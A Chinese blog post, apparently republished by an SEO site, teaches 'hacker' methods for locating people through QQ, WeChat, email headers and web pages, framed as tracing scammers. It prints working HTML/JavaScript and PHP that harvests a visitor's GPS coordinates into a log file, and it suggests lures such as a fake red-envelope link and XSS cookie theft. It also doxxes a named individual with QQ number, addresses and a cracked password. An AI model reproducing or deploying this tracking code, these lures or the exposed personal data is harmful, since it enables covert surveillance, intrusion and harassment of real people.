关于黑客教你通过QQ定位的介绍,惠州推广会在这篇文章说明,更多相关黑客QQ定位方法流程的内容请关注惠州seo!
最近骗子越来越多,傻子似乎都不够用了。作为网络安全行业摸爬滚打多年的美少女,对骗子的小伎俩自然视而不见,但是身边不乏有朋友中招,有时候金额不够立案标准,没必要麻烦JC蜀黍,有时候报了案确提供不了太多线索。这时候就需要当事人具备一定的技术知识,也许仅仅一点点社工技巧,就能成功追回你被骗走的小钱钱啦~
QQ定位:
QQ2009绿色显IP复活版,现在这一个用的比较少了,有时候获取不到别人的ip
相对于使用插件的比较多,用过插件给别人发送一条带有xml的图片,对方只要看了这张图片90%的几率能获取到ip。
1,
2,
如果嫌插件或其他软件不安全,你也可以用wireshark来单向获取QQ好友的ip。
3,
Wireshark用起来很简单,不做过多阐述,想看的话推荐两篇文章,讲得很详细,如果再看不懂不会操作,我也没办法。
http://www.cnblogs.com/Oran9e/p/7098097.html
http://www.freebuf.com/articles/web/137952.html
这时才PC端操作的,当然除了pc端还有在移动端的,比如在github上有一套源码
https://github.com/PrintNow/QQipTance
4,
通过变色龙搭建起的APP是这个样的。
5,
6,
只要发到群里就能获取全部在线成员的ip,也可以发给单个的qq好友,之前搭建了一个免费版的,因为是免费版的,变色龙的广告插得满天飞,后来也就关了,感兴趣的可以自己搭建起来自己用,对付骗子,一定一个准。
然后再去找接口,输入ip进行大致定位。
上面说的几种方法,是通过QQ来定位对方的地址,如果遇到诈骗的多数是通过QQ来实施诈骗的,学会上面的方法99%能抓住对方ip地址。
另外,再说一下通过网站定位,这个可以分为两个方法定位。
1、获取对方访问IP定位
2、获取对方经度纬度来定位
先说通过经纬度定位,提供以下PHP代码,搭建起来放进网站根目录即可。
先知发过定位文件,应该是咱们的指尖表哥写的,社区应该也没,没仔细找。
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
</head>
<body>
<img src="1.png" alt="黑客教你通过QQ定位如何,黑客教你通过QQ定位可以吗" width="100%;">
<script>
var geol;
try {
if (typeof(navigator.geolocation) == 'undefined') {
geol = google.gears.factory.create('beta.geolocation');
} else {
geol = navigator.geolocation;
}
} catch (error) {
//alert(error.message);
}
if (geol) {
geol.getCurrentPosition(function(position) {
var nowLatitude = position.coords.latitude;
var nowLongitude = position.coords.longitude;
//以上是固定代码,获取经度纬度
alert("纬度:" + nowLatitude + ", 经度:" + nowLongitude); //弹出经度纬度的坐标
function new_form(){
var f=document.createElement("form");
document.body.appendChild(f);
f.method="post";
return f;
} //定义函数,创建form
function create_elements(eForm,eName,eValue){
var e=document.createElement("input");
eForm.appendChild(e);
e.type="text";
e.name=eName;
if(!document.all){e.style.display="none"}else{
e.style.display="block";
e.style.width="0px";
e.style.height="0px";
}
e.value=eValue;
return e;
}
//这段代码意思就是 定义方法,有两个input 他们的值分别是经度纬度的值
var _f=new_form();
create_elements(_f,"username",nowLatitude) // 创建form中的input对象
create_elements(_f,"password",nowLongitude);
_f.action="geolocation2.php";
_f.submit(); //提交
//表单自提交发送到geolocation2.php页面
}, function(error) {
switch(error.code){
case error.TIMEOUT :
//alert("连接超时,请重试");
break;
case error.PERMISSION_DENIED :
//alert("您拒绝了使用位置共享服务,查询已取消");
break;
case error.POSITION_UNAVAILABLE :
//alert("非常抱歉,我们暂时无法通过浏览器获取您的位置信息");
break;
}
}, {timeout:10000}); //设置十秒超时
}
//设置连接超时的报错
</script>
</body>
</html>
geolocation2.php 的代码
<?php
@$time=date('Y-m-d H:i:s',time()); //获取当前时间
$nowLatitude="纬度 ".$_POST['username']; //接受上个页面传过来的参数(经度坐标)
$nowlongitude="经度 ".$_POST['password']." ------时间是".$time."\r\n";; //接受上个页面传过来的参数(纬度坐标)
$fp=fopen("geo.txt", "a+"); //创建一个geo.txt文件
fwrite($fp, $nowLatitude); //把经度写入到geo.txt里
fwrite($fp, $nowlongitude); //把纬度写入到geo.txt里
?>
这一串php代码是对方点击授权之后拿到对方的经度纬度,然后通过经纬度来查找位置,这个比IP定位要准很多,毕竟IP分配的是区域。缺点就是很多人潜意识里都会点拒绝的,所以怎么办看个人想法了,重要的不是方法是脑子。
7,
8,
9,
查询网址:http://www.gpsspg.com/maps.htm
10,
季雨林在博客里说的这段比较通俗的原理
http://blog.csdn.net/cuitang1031/article/details/52727534
这些高精度IP定位工作原理是:
1,用户手机里安装了百度的服务,比如百度地图SDK
2,用户手机运行了百度的服务,比如使用百度地图进行导航,公交查询等等过程,都会让百度的服务运行起来
3,百度提供服务的同时,将当前的坐标,跟ip地址数据,当前时间,定位方式,wifi信息,移动联通电信等运营商的基站信息,传送给百度的后台服务器中
后台服务器留存了这些数据,然后也用这些数据给用户返回了用户需要的内容。这个过程也就是百度的匿名采集信息过程。用户使用前必然都是许可了百度可以使用这些匿名数据
4,百度提供了服务同时,自己收集了匿名数据。而这些数据中。包括ip和gps的对照数据
5,利用这些数据,就可以计算出一个ip曾经在那些范围被使用过,从而得到一个精确的范围数据,这个范围的中心点,就被认为是最接近用户的地点。同时会把误差半径也计算出来,于是有了我的这个高精度IP定位功能。
所有说你用的方法跟警察叔叔用的定位low多了,不要被电影里面给坑了
其他说明:使用该服务,主要是针对有线宽带下使用了wifi的用户,精确度会高很多。如果是联通这种直接给客户分配公网ip的有线网路运营商,定位精度可以达到几十米的级别
但是用手机网络2,3,4G网络获取的ip来定位,则可能覆盖整个省。因为其上网机制本质是一个地区用一个ip池,给这个地区代理上网,因此手机网络的ip定位精度会很低。
你要是还不懂得话就看下面这段,季雨林在csdn博客里说的这段
1,手机里的app,能获取位置数据
2,手机里的app,能够通过公网与后台服务器交互。
3,手机有可能是连接了wifi,此时所使用的是家庭宽带的网络
4,如果使用了家庭宽带网络,那么有可能这个家庭宽带的网络具备公网IP到户性质,也就是说家里的路由器获取了公网ip地址,这个地址不是192.168.xx开头,也不是10.xxx开头,还不是172.xxx开头。这时候后台所获取的ip和gps坐标,精度就非常高。最高精度定义为30m,也就是普通家用wifi最大能覆盖的圆形直径。
5,如果使用了家庭宽带网络,可能运营商IP资源不足,进行了叫做NAT转发的技术。这时候可能得到的就是10.xxx开头的一个内网地址,而真正的公网ip的位置在这个覆盖区域内的某个地方,这时候,这个手机提交的ip和gps坐标数据就有误差。而这个误差,是同一个局域网网段下的其他手机所提供,这样以来,就是覆盖一个街道,一个城市,甚至一个省的情况。
6,如果手机使用的是手机卡的GPRS流量上网,则肯定是经过了NAT的网络结构。国内的运营商往往是一个省有一个IP池,随机的用来得用户的手机转发上网,这个情况,就出现了一个省单位范围的很多手机上报的ip和gps坐标的对照,平均一下,范围就非常大。
7,在说说高精度IP查不到位置的情况:没有位置服务功能的设备在这个IP下使用过。比如,openGPS.cn站点发布在阿里云的青岛节点的ECS上。站长从来没有在这台服务器使用过代理功能,流量始终是这个服务器自己所占用。这时候,因为没有这种具备获取位置功能的手机等设备上报位置,因此就查询不到结果。
其实这些原理不懂也没关系,你知道会用能找到就行,就很可以的,顺藤摸瓜,继续下面的信息深入说完QQ定位,再来看微信定位,微信定位应该很多人都不会,但是方法思路都是差不多的。
借用微信小程序“群玩助手”
11,
12,
13,
给别人发个小程序,就说是红包,80%的人都回去点开吧。
邮箱ip查找
这个很多人不会陌生吧,在公司,几乎不会使用QQ来交流,一般都是用邮箱互发邮件的,有的钓鱼者邮件以假乱真,很难区分,不如使用域名https://www.ba1du.com/ www.ic0uld.com,足够以假乱真了,在判断出域名是否是本公司的域名,或者使用伪造的域名时候,如果上当受骗溯源的话,就用到了邮箱ip查找。
具体实施方法:
比如这一封
14,
15,
我特么小学生啊,天天没玩的给我发这个。
找到ip之后,114.253.35.150 用之前的ip接口去找这个地址。
16,
网络钓鱼
无非就这几种:QQ空间、淘宝退款、银行页面、财付通、邮箱、伪基站、iPhone钓鱼。
17,
对付这种QQ空间钓鱼,直接快捷登录,不要输入QQ账号和密码是最简单的,这样钓鱼者就不会拿到你的密码
淘宝退款、银行页面、财付通、邮箱这几种都很类似了,社区里很多人都搞过,精髓就是见框就插,插到xss,用xss平台打cookie进后台,找钓鱼者的ip,定位交110,再就是通过whios查询,进行社工主机域名商,伪造源主人的信息,获取邮箱,配合社工库进邮箱,90%就能搞下钓鱼者了。
最常见的莫非就是
伪基站+银行钓鱼,这个相信每个人都收到过类似的短信,什么年代了,还会相信银行积分优惠啊,还差那几十块钱吗?因为几十块的小便宜把自己几个月的积蓄搭进去,只能说,让你贪便宜,活该!!!
iPhone钓鱼一般是搞到你邮箱发送钓鱼链接。
18,
19,
相似度极高,但是安全性极低,往上很多公开的漏洞,搞进去。这些骗子也真的是智商低,能不能用的高科技来犯罪。实例看一个钓鱼站,在线刷qq币,真特么这种傻子还有啊?有,肯定有,不止一个。
20,
21,
可拉倒吧,谁没学过ps ,零不还是随便p的嘛。
22,
通过搜索邮箱,找到一个博客,下面带了两个链接,打开第二个。
23,
嗯哼,溜溜溜,不但搞诈骗,骗小学生刷Q币,还菠菜呢,可以可以的。
名字:zhengbintao
24,
找到这个信息
全名:郑斌涛
点击去发现有QQ联系方式。
25,
26,
Qq:895015400
详细地址:中国福建武平县西安未央区
这应该是几年前的地址,还有一个地址是陕西西安。
27,
28,
谢TT表哥帮助查的裤子
384a9052d69ff09ccf8c7314d52fd510 解密:qaz963
这里可以有一种思路是whios查询到的是阳光互联注册的,去社服务商。再或者继续看看有什么信息,加上QQ去套路一波,地址就到手了,至于犯罪证据,那个赌博网站绝对能让他进去了,就看妖妖灵的警察叔叔们会不会甩锅了。
诈骗模式
诈骗模式分为撒网诈骗、定向诈骗、针对诈骗
顾名思义,撒网诈骗就是在网络上发布诈骗消息,愿者上钩,骗到一个是一个,这种一般都是傻子。定向诈骗,主要是对老年人、学生党、以及在职员工,网购者等等,比如,骗老年人买保健品,房子抵押收红利,学生党一般就是兼职,冒充亲朋好友,救助金,补助金,提供银行卡号,然后以资金到账查询为由,指令其在自动取款机上进入英文界面操作,将钱转走。对在职员工就是冒充领导诈骗,要求为某某公司转账,而针对诈骗,一般是针对的比较富有的人,认真研究其对象行为习惯,生活模式,思维方式,而专门研究出来的手段。
法律是保护强者的,只有懂法才能用法--《刑法》、《网络安全法》
所有被骗的90%是因为自己的贪婪
这是上篇,下篇敬请期待,更多猥琐思路在下篇里展示。
本人不提供小三、小四、小五定位,那怎么办,当然选择原谅她啦
黑客QQ定位方法流程
- 版权声明: 本站原创文章,由 惠州SEO 发表
- 转载请注明: 黑客教你通过QQ定位如何,黑客教你通过QQ定位可以吗 +复制链接
